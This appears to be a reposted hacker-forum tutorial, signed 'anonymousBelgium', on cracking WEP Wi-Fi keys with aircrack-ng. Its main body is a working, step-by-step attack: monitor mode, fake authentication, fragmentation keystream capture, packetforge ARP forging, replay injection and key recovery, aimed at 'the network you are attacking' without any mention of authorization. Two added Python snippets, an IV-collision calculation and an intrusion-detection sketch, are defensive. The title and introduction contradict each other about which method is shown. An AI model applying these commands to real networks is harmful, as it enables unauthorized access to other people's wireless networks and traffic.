anonopsbelgium

CRACKING WEP WITH NO CLIENTS

Jan 31st, 2012
Ok, this tutorial should be pretty straightforward and easy; then again, that's the entire idea behind a tutorial, right? Anyway, to business: this tutorial will show you how to crack WEP very quickly using aircrack-ng on the BackTrack security live CD, which you can find here:

http://www.remote-exploit.org/backtrack.html

**quick note, cracking WEP with no clients will be out tonight/sometime real soon**

We will go over
1) Putting your Atheros based card into monitor mode
2) Getting packet injection ready
3) Injecting/sniffing
4) Cracking the WEP key

This is the easier method, the one where the WEP network has clients present, and you can use a deauth attack on them. Ok, enough talk, to business!

Monitor Mode

The first thing to do is boot up BackTrack, basically by booting to a CD like you normally would; if you can't figure this out, ask down below, or go use Google. Log in to BackTrack as root (password 'toor'), and then type "startx" on the command line to start the GUI.

Sweet, now we are running *nix, and we can start the good stuff. Open up a command line by clicking on the icon that looks like one on the bottom, next to the 'start' type thingy (let me know if I get too technical :) )

Now, we need to enter this into the command line:

Code:
$ airmon-ng start wifi0 6

**starts wifi0 on channel 6; change this to the channel of the network you are attacking, use kismet to find it, not covered in this tutorial**

$ wlanconfig ath0 destroy
$ ifconfig ath1 up
$ iwconfig ath1 mode monitor channel 6

Sweet, now we have our card in monitor mode, and we can move on to bigger and better things.

Start up airodump and get some info ready

Ok, let's start airodump so we can get some info out of it, and then we can just leave it running.

Code:
$ airodump-ng --ivs --write bob --channel 6 ath1

**basically here's what each thing means:
--ivs = only write the weak IVs, not every packet
--write = the prefix of the file we are writing to, so bob.ivs
--channel = the channel to scan on
ath1 = our network device**

Now that airodump is running, we need to snag a couple of pieces of information from it: 1) the MAC address of the AP we are attacking, it'll be in the first column; 2) the ESSID of the network, i.e. "linksys" or something similar.

Now, open up a new terminal (DON'T CLOSE AIRODUMP) and type this line in:

Code:
$ export AP=mac_of_ap

Now we also have to get our own MAC address; this is easy in BackTrack, just type in the following:

Code:
$ macchanger --show ath1
**your output here**
$ export MAC=your_mac_address

This basically just stored those as variables, so you don't have to type them a bunch of times in the coming steps.

Getting everything ready

Basically what we are going to do to the network is fake-authenticate ourselves using aireplay. Then, using the same program, we are going to grab some pieces of packets out of the replies given by the fake auth, and use those to create an ARP reply packet with packetforge, to inject into the network to create IVs, so we can crack the key! Whew, let's get started!

First we need to set up, but NOT run, our fake auth attack:

Code:
$ aireplay-ng -1 0 -e linksys -a $AP -h $MAC ath1

So, we are running aireplay attack 1, with no delay; linksys is the ESSID of the network we are attacking, -a is the MAC of the AP we are attacking, and -h is our MAC address. Don't run this yet, we will soon enough.

Open up another command line, so we can get ready to sniff out the packets we need. Enter the following (note the interface name at the end, the same ath1 as everywhere else):

Code:
$ aireplay-ng -5 -b $AP -h $MAC ath1

Cool, step 1 of 2 is done for getting ready to create IVs; next we have to sniff a packet, and then create one of our own. So run the aireplay -5 command first, it will start to sniff the network, then run the first command. Eventually the -5 will find a packet that it can use, and it will ask you if you want to use it; say yes (type y and press enter). Now you can cancel the first command (stop it from fake auth'ing over and over) by pressing ctrl-c. Leave the window open.

Now, after we told aireplay-ng -5 yes, it should have created a .xor file. In the output, the name of it should be there. The line looks like this:

Code:
Saving Keystream in fragment-0215-124336.xor

**yours will be different**

Now, using this .xor file we can create an ARP-reply packet which we can inject to create weak IVs. So in the same window where we ran the aireplay-ng -5 command, type in the following:

Code:
$ packetforge-ng -0 -a $AP -h $MAC -k 255.255.255.255 -l 255.255.255.255 -y your_.xor_file.xor -w arp-request

That will generate what we need; now we can run the final injection command that will inject the arp-request packets. Enter the following:

Code:
$ aireplay-ng -2 -r arp-request ath1

*you will have to say yes again btw*

Now you get to watch your #Data column in airodump (you didn't close it, did you?) skyrocket! Wait a few minutes, and when you have 100k packets (the #Data column; 1 mil for 128 bit) run the following command to crack the key!
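
Some added crypto-side context, not part of the original tutorial: the reason piling up #Data matters at all is that WEP builds every packet's RC4 key from a 24-bit IV glued onto the shared key, so there are only 2^24 IVs to go round and the same per-packet key gets reused sooner or later. The snippet below is example code (not anything shipped with aircrack-ng or BackTrack) that works out how quickly random IVs start repeating using the birthday bound. It assumes the IVs are picked uniformly at random, which is the best case for the network; cards that just count upwards from zero are more predictable still. The 100k / 1 mil figures above are about how many IVs the statistical key-recovery in aircrack-ng wants, which is a separate (and smaller) number than IV exhaustion.

```python
"""Birthday-bound arithmetic for WEP's 24-bit IV space.

Added illustration, not part of the tutorial. The only WEP fact used is that
the IV is 24 bits wide; everything else is standard probability.
"""
import math

IV_BITS = 24
IV_SPACE = 2 ** IV_BITS  # 16,777,216 distinct IVs


def p_iv_repeat(n, space=IV_SPACE):
    """Probability that at least two of n uniformly random IVs are identical.

    Exact: 1 - prod_{i=0}^{n-1} (1 - i/space), accumulated in log space so the
    product does not underflow to zero for large n.
    """
    if n > space:
        return 1.0  # pigeonhole: more frames than IVs guarantees a repeat
    log_no_collision = sum(math.log1p(-i / space) for i in range(n))
    return 1.0 - math.exp(log_no_collision)


def expected_iv_repeats(n, space=IV_SPACE):
    """Expected number of colliding IV pairs among n random IVs: C(n, 2) / space."""
    return n * (n - 1) / (2 * space)


def frames_for_repeat_probability(p, space=IV_SPACE):
    """Smallest n (birthday approximation) at which P(some IV repeats) >= p."""
    if not 0 < p < 1:
        raise ValueError("p must be strictly between 0 and 1")
    return math.ceil(math.sqrt(-2 * space * math.log(1 - p)))


if __name__ == "__main__":
    print(f"IV space: {IV_SPACE:,} values")
    print(f"frames for a 50% chance of a repeated IV: {frames_for_repeat_probability(0.5):,}")
    for n in (1_000, 5_000, 100_000, 1_000_000):
        print(f"{n:>9,} frames: P(repeat) = {p_iv_repeat(n):.4f}, "
              f"expected colliding pairs = {expected_iv_repeats(n):,.1f}")
```

The takeaway for anyone still running WEP: by the time airodump shows the 100k frames the tutorial waits for, hundreds of IV pairs have already repeated, and that is before counting the keystream-recovery tricks the rest of the walkthrough uses. Replace WEP rather than tune it.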

Code:
$ aircrack-ng -n 64 -b $AP *.ivs

**note, if it's 128 bit, change 64 to 128**
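
Now the flip side, for anyone running a network rather than poking at one. This is an added example, not something from the tutorial or from the aircrack-ng project: a small Python sketch of how a wireless IDS would spot the two things this walkthrough generates, a station fake-auth'ing "over and over" and a single forged frame being replayed hundreds of times to make #Data skyrocket. The frame log, MAC addresses, window size and thresholds are all constructed for the example; on a real sensor you would feed it frame summaries from your own capture tool and tune the thresholds to your environment.

```python
"""WIDS-style heuristics for the two traffic patterns the tutorial above produces.

Constructed example (not from the tutorial): each frame summary is a tuple
(time_seconds, source_mac, dest_mac, kind, length_bytes) where kind is "auth"
for an 802.11 authentication request or "data" for a data frame. MAC addresses,
timings and sizes below are made up.
"""
from collections import defaultdict

AP = "00:14:6c:7e:40:80"       # constructed access point BSSID
LEGIT = "00:0f:b5:88:ac:82"    # constructed legitimate client
SUSPECT = "00:0f:b5:ab:cb:9d"  # constructed station showing both patterns


def build_sample_frames():
    """Return a constructed, time-sorted frame log mixing normal and suspect traffic."""
    frames = [(0.0, LEGIT, AP, "auth", 30)]
    # Normal client: one authentication, then 20 data frames of varying length.
    for i in range(20):
        frames.append((1.0 + 3 * i, LEGIT, AP, "data", 100 + (i * 37) % 900))
    # Pattern 1: repeated authentication requests from one MAC within seconds
    # (a fake-auth loop re-associating "over and over").
    for i in range(8):
        frames.append((10.0 + 0.4 * i, SUSPECT, AP, "auth", 30))
    # Pattern 2: a burst of identically sized data frames from one MAC
    # (one forged frame being replayed to inflate the IV count).
    for i in range(200):
        frames.append((20.0 + i * 0.025, SUSPECT, AP, "data", 68))
    frames.sort(key=lambda f: f[0])
    return frames


def _bucket(t, window):
    """Index of the fixed-size time window that timestamp t falls into."""
    return int(t // window)


def detect_auth_flood(frames, window=10.0, threshold=5):
    """Map (src, dst) -> peak authentication requests seen in one window.

    Only pairs reaching `threshold` in at least one window are returned. A
    normal client authenticates once per association, so a handful of
    requests to the same AP within seconds is anomalous.
    """
    per_window = defaultdict(int)
    for t, src, dst, kind, _length in frames:
        if kind == "auth":
            per_window[(src, dst, _bucket(t, window))] += 1
    alerts = {}
    for (src, dst, _w), n in per_window.items():
        if n >= threshold:
            alerts[(src, dst)] = max(n, alerts.get((src, dst), 0))
    return alerts


def detect_replay_flood(frames, window=10.0, threshold=50):
    """Map (src, dst, length) -> peak count of same-size data frames in one window.

    Real traffic varies in size; hundreds of data frames of exactly the same
    length from one station in a few seconds is the signature of frame replay.
    """
    per_window = defaultdict(int)
    for t, src, dst, kind, length in frames:
        if kind == "data":
            per_window[(src, dst, length, _bucket(t, window))] += 1
    alerts = {}
    for (src, dst, length, _w), n in per_window.items():
        if n >= threshold:
            key = (src, dst, length)
            alerts[key] = max(n, alerts.get(key, 0))
    return alerts


if __name__ == "__main__":
    log = build_sample_frames()
    for (src, dst), n in detect_auth_flood(log).items():
        print(f"auth flood: {src} -> {dst}, {n} requests in one 10 s window")
    for (src, dst, length), n in detect_replay_flood(log).items():
        print(f"replay flood: {src} -> {dst}, {n} frames of {length} bytes in one 10 s window")
```

Both checks key on the attacker's own MAC (the -h value in the commands above), so a sensor that logs source addresses gets you a station to look for; pairing it with a per-BSSID data-frame rate alarm catches the same burst even when the replayed frames are padded to different sizes.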

re-edit by anonymousBelgium. lulz